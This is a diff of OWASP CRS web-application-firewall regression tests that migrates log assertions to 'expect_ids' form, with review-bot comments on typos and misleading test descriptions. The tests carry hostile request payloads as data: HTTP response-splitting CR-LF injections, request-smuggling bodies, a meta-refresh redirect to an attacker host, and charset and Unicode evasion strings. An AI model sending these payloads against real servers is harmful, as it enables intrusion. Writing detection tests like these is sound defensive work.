@@ -196,7 +207,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] # TODO: this case is not yet handled by 3.1, future work # - test_id: 6 # stages: @@ -212,7 +224,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # epxect_ids:: [920480] - test_id: 7 stages: - input: @@ -228,7 +241,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 8 stages: - input: @@ -244,7 +258,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] # TODO: this test should pass (works with curl), to be researched # - test_id: 9 # stages: @@ -260,7 +275,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] # TODO: this test should pass (works with curl), to be researched # - test_id: 10 # stages: @@ -276,7 +292,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] - test_id: 11 stages: - input: @@ -284,16 +301,15 @@ tests: port: 80 method: "POST" headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - # random other IBM charset - Content-Type: "application/x-www-form-urlencoded;charset=ibm038" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" + User-Agent: "OWASP CRS test agent" + Host: "localhost" + # double charset may cause evasion + Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] # TODO: this case is not yet checked by CRS, future work # - test_id: 12 # stages: 
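Review bot: The converted line in the commented-out test 6 reads `# epxect_ids:: [920480]`, which is both misspelled and has a doubled colon; whoever uncomments this TODO test will get a YAML parse error at best, or a silently ignored unknown key with no assertion at worst, depending on how strictly the runner validates `output.log`. It should be `#       expect_ids: [920480]` to match the form used by every other hunk in this change. Nothing else in the hunk changes behaviour, since the test stays commented out.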
@@ -309,7 +325,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] # TODO: this case is not yet checked by CRS, future work # - test_id: 13 # stages: @@ -325,7 +342,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] - test_id: 14 stages: - input: @@ -342,7 +360,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 15 stages: - input: @@ -359,7 +378,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 16 stages: - input: @@ -376,7 +396,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 17 stages: - input: @@ -392,4 +413,5 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml index b5c1c7246..33745cc40 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml @@ -21,7 +21,8 @@ tests: data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" version: "HTTP/1.1" output: - log_contains: "id \"920490\"" + log: + expect_ids: [920490] - test_id: 2 stages: - input: @@ -38,7 +39,8 @@ tests: data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" version: "HTTP/1.1" output: - no_log_contains: "id \"920490\"" + log: + no_expect_ids: [920490] - test_id: 3 stages: - input: @@ -54,4 +56,5 @@ tests: data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" version: "HTTP/1.1" output: - no_log_contains: "id \"920490\"" + log: + no_expect_ids: [920490] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml index c665c96f7..fdc5f2753 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920500\"" + log: + expect_ids: [920500] - test_id: 2 desc: "Check request filename contains file that ends with ~ but not at end of string (bypass)" stages: @@ -33,7 +34,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920500\"" + log: + expect_ids: [920500] - test_id: 3 desc: "Rules 920500 should not block user dir such as /~user/" stages: @@ -48,4 +50,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920500\"" + log: + no_expect_ids: [920500] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml index d048775fe..3142e77cf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml @@ -19,7 +19,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 2 desc: "block request with an invalid cache-control directive in request" stages: 
@@ -35,7 +36,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 3 desc: "block request with an invalid cache-control directive in request with multiple directives" stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 4 desc: "block request with an invalid cache-control syntax in request with multiple directives" stages: @@ -67,7 +70,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 5 desc: "allow request with valid cache-control single directive" stages: @@ -83,7 +87,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920510\"" + log: + no_expect_ids: [920510] - test_id: 6 desc: "allow request with valid cache-control multiple directive" stages: @@ -99,4 +104,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920510\"" + log: + no_expect_ids: [920510] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml index dc3463fab..71ae7ff93 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml 
@@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 2 desc: "Allowed Accept-Encoding: gzip,deflate,identity" stages: @@ -35,7 +36,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 3 desc: "Allowed Accept-Encoding: compress;q=0.5, gzip;q=1.0" stages: @@ -51,7 +53,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 4 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -67,7 +70,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 5 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -83,7 +87,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 6 desc: "Allowed empty Accept-Encoding" stages: @@ -99,7 +104,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 7 desc: "Not allowed Accept-Encoding CVE-2022-21907" stages: @@ -115,7 +121,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920520\"" + log: + expect_ids: [920520] - test_id: 8 desc: "False positive test for long Accept-Encoding headers from internet.nl" stages: @@ -131,7 +138,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 9 desc: "False positive test for long Accept-Encoding of length 99" stages: @@ -147,4 +155,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml index d437f1090..820a71b7f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml @@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 2 desc: "Allowed Accept-Encoding: gzip,deflate,identity" stages: @@ -35,7 +36,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 3 desc: "Allowed Accept-Encoding: compress;q=0.5, gzip;q=1.0" stages: @@ -51,7 +53,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 4 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -67,7 +70,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 5 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -83,7 +87,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 6 desc: "Allowed empty Accept-Encoding" stages: @@ -99,7 +104,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 7 desc: "Not allowed Accept-Encoding: foobar" stages: @@ -115,4 +121,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920521\"" + log: + expect_ids: [920521] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml index 1f9720d52..ae8da2bdf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml 
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml @@ -20,7 +20,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920530\"" + log: + no_expect_ids: [920530] - test_id: 2 desc: "Bypass attempt with two charsets" stages: @@ -37,7 +38,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920530\"" + log: + expect_ids: [920530] - test_id: 3 desc: "Bypass attempt with hiding the charset inside a field" stages: @@ -54,7 +56,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920530\"" + log: + expect_ids: [920530] - test_id: 4 desc: "Bypass attempt with uppercase CHARSET" stages: @@ -71,4 +74,5 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920530\"" + log: + expect_ids: [920530] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml index c8a02d6f0..2e2f57606 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml @@ -20,7 +20,8 @@ tests: data: "testarg=%5Cu0061lert" version: "HTTP/1.1" output: - log_contains: "id \"920540\"" + log: + expect_ids: [920540] - test_id: 2 desc: "Unicode character bypass issue #2512: eval() eval()" stages: @@ -37,7 +38,8 @@ tests: data: "testarg=%5Cu0065val%28%29" version: "HTTP/1.1" output: - log_contains: "id \"920540\"" + log: + expect_ids: [920540] - test_id: 3 desc: "Unicode character bypass: negative test for JSON (double encoded as JSON parser decodes it)" stages: @@ -54,4 +56,5 @@ tests: data: "{\"testarg\": \"\x5c\x5cu0065val\"}" version: "HTTP/1.1" output: - no_log_contains: "id \"920540\"" + log: + no_expect_ids: [920540] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml index 2fd76434c..b3ecb693e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml @@ -16,7 +16,8 @@ tests: Accept: text/html;q=0.9;charset=CP1026,*/*;q=0.8 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 2 stages: - input: @@ -29,7 +30,8 @@ tests: Accept: text/html;q=0.9;charset="CP1026",*/*;q=0.8 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 3 stages: - input: @@ -42,7 +44,8 @@ tests: Accept: text/html; charset=CP1026 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 4 stages: - input: @@ -55,7 +58,8 @@ tests: Accept: text/html;q=0.9;charset=UTF-8,*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 5 stages: - input: @@ -68,7 +72,8 @@ tests: Accept: text/html;q=0.9;charset="UTF-8",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 6 stages: - input: @@ -81,7 +86,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 7 stages: - input: @@ -94,7 +100,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8;charset=utf-16 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 8 stages: - input: @@ -107,7 +114,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8;charset=utf-8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 9 stages: - input: 
@@ -120,7 +128,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-15",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 10 stages: - input: @@ -133,7 +142,8 @@ tests: Accept: text/html;q=0.9;charset="windows-1252",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 11 stages: - input: @@ -146,7 +156,8 @@ tests: Accept: text/html;q=0.9;charset="windows-1252",*/*;q=0.8; version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 12 stages: - input: @@ -159,7 +170,8 @@ tests: Accept: text/html;q=0.9;charset="windows-1252";,*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 13 desc: Allow "*" only media type stages: @@ -173,7 +185,8 @@ tests: Accept: text/html;q=0.9;charset="utf-8";,*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 14 desc: Allow "q=.1" instead of "q=0.1" stages: @@ -187,7 +200,8 @@ tests: Accept: text/html;q=0.9;charset="utf-8";,*/*;q=.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 15 desc: False positive test request that violates the spec but should be tolerated stages: @@ -201,4 +215,5 @@ tests: Accept: text/html;q=0.9;charset=utf-8, *;q=0.1 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml index 3f1f4c617..d89882d6d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml 
@@ -17,19 +17,18 @@ tests: Accept: text/html;q=0.9,*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: "id \"920610\"" -# Commented test because Apache errors before processing the rules, meaning it will always fail in our CI environment. -# - test_id: 2 -# desc: Raw URL fragment test -# stages: -# - input: -# dest_addr: "127.0.0.1" -# port: 80 -# uri: "/#fragment" -# headers: -# User-Agent: "OWASP CRS test agent" -# Host: "localhost" -# Accept: text/html;q=0.9,*/*;q=0.8 -# version: "HTTP/1.1" -# output: -# log_contains: "id \"920610\"" + log: + no_expect_ids: [920610] + - test_id: 2 + desc: Raw URL fragment test + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/#fragment" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/html;q=0.9,*/*;q=0.8 + output: + status: 400 diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml index 2187c0d9c..f3cb87bce 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml 
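Review bot: The re-enabled test 2 now asserts only `status: 400` and carries no `log:` expectation, so it no longer exercises rule 920610 at all — it documents that the web server rejects a raw `#` in the request line before the engine sees it, which is why the test had been commented out. That is a reasonable thing to pin, but the `desc` should say so, otherwise a reader assumes a 400 means the rule blocked; I would change it to `desc: "Raw URL fragment: the web server rejects the request line (400) before rules run, so rule 920610 is not exercised here"`. Also note the `version: "HTTP/1.1"` line present in the old commented block was dropped; if the runner defaults the version that is fine, but it differs from every other test in this file.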
@@ -5,11 +5,17 @@ meta: rule_id: 920620 tests: - test_id: 1 - desc: Multiple Content-Type request headers + desc: | + Multiple Content-Type request headers. + On httpd, the two headers will be concatenated into a single header. + Thus, this rule will not trigger on httpd. stages: - input: dest_addr: "127.0.0.1" port: 80 encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg==" output: - log_contains: "id \"920620\"" + # match reflected request in JSON response from httpbin + response_contains: |- + Content-Type\W*: \[\W*application/json, application/xml + no_expect_ids: [920620] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml index 69ebf3ccc..26ee82fe0 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml @@ -19,7 +19,8 @@ tests: data: "var=%0aPOST / HTTP/1.0" version: HTTP/1.0 output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 2 desc: "HTTP Response Splitting" stages: @@ -36,7 +37,8 @@ tests: data: "var=aaa%0aGET+/+HTTP/1.1" version: HTTP/1.0 output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 3 desc: "HTTP Response Splitting" stages: @@ -53,7 +55,8 @@ tests: data: "var=aaa%0dHEAD+http://example.com/+HTTP/1.1" version: HTTP/1.0 output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 4 desc: "HTTP Response Splitting - pre-HTTP/1.0" stages: 
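Review bot: `no_expect_ids: [920620]` is placed directly under `output:` here, whereas every other hunk in this change nests `expect_ids`/`no_expect_ids` under `output.log`; if the runner only reads ids from `log:`, this negative assertion is silently never evaluated and the test passes on the strength of `response_contains` alone. Move it under a `log:` key, i.e. `  log:` / `    no_expect_ids: [920620]`, indented as in the sibling files. Separately, the test's expectation is now "rule must not fire because httpd merges the two headers", so on any engine or server that keeps the headers separate (the case the rule exists for) this test fails by design and will need a platform override; the desc should state that explicitly, and the `response_contains` regex assumes an httpbin-style echo backend, which ties the test to the CI backend.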
@@ -70,7 +73,8 @@ tests: data: "var=aaa%0d%0aGet+/foo%0d" version: HTTP/1.0 output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 5 desc: "HTTP Response Splitting" stages: @@ -87,7 +91,8 @@ tests: data: "var=aaa%0d%0aGet+foo+bar" version: HTTP/1.0 output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 6 desc: HTTP Request Smuggling bypass with Content-Type text/plain stages: @@ -105,7 +110,8 @@ tests: data: "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n" version: "HTTP/1.1" output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 7 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: @@ -120,7 +126,8 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" version: "HTTP/1.1" output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 8 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: @@ -135,7 +142,8 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" version: "HTTP/1.1" output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 9 desc: "HTTP Response Splitting false negative test" stages: @@ -151,7 +159,8 @@ tests: data: "var=soundtrack Gympl\r\nanything" version: "HTTP/1.1" output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 10 desc: "HTTP Response Splitting false positive test issue 2054" stages: @@ -167,7 +176,8 @@ tests: data: "var=budget foo)</bar>\n" version: "HTTP/1.1" output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 11 desc: "HTTP Response Splitting false positive test issue 2054" stages: @@ -183,4 +193,5 @@ tests: data: "var=get it\n" version: "HTTP/1.1" output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] 
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml index 31bf2953d..c7cf96622 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml @@ -22,7 +22,8 @@ tests: uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> version: HTTP/1.1 output: - log_contains: id "921120" + log: + expect_ids: [921120] - test_id: 2 desc: "HTTP Response splitting attack" stages: @@ -39,7 +40,8 @@ tests: uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423<html>ftw</html>" version: HTTP/1.1 output: - log_contains: id "921120" + log: + expect_ids: [921120] - test_id: 3 desc: "Fix FP issue 1615. Header followed by word chars." stages: @@ -56,7 +58,8 @@ tests: uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" version: HTTP/1.1 output: - no_log_contains: id "921120" + log: + no_expect_ids: [921120] - test_id: 4 desc: "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression" stages: @@ -74,4 +77,5 @@ tests: data: "var=%0d%0aContent-Length: 0" version: HTTP/1.1 output: - log_contains: id "921120" + log: + expect_ids: [921120] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 3c54a10dc..24d5448c7 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -22,7 +22,8 @@ tests: uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] - test_id: 2 desc: "HTTP Response splitting attack: cookie data" stages: 
@@ -38,7 +39,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] - test_id: 3 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: @@ -53,7 +55,8 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] - test_id: 4 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: @@ -68,4 +71,5 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml index a6b5cade5..224232ba5 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml @@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id:921140" + log: + no_expect_ids: [921140] - test_id: 2 desc: "HTTP Header Injection Attack via headers" stages: @@ -35,4 +36,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id:921140" + log: + no_expect_ids: [921140] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml index c56c5082a..9a57c4427 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml @@ -18,7 +18,8 @@ tests: uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" version: "HTTP/1.1" output: - log_contains: "id \"921150\"" + log: + expect_ids: [921150] - test_id: 2 desc: "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)" stages: 
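Review bot: The old assertions in 921140.yaml looked for `id:921140`, a string that does not match the `id "921140"` log format used by every other file in this change, so both negative checks could never fail; with `no_expect_ids` they become real assertions for the first time, and the two tests are worth a second look. Test 2 is described as `HTTP Header Injection Attack via headers` but expects the rule not to fire, which reads as a contradiction unless it is a false-positive or bypass test; I would make that explicit, e.g. `desc: "False positive check: header values that look like injection but must not trigger 921140"`, or turn it into a positive test with `expect_ids: [921140]` if the payload is supposed to be caught.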
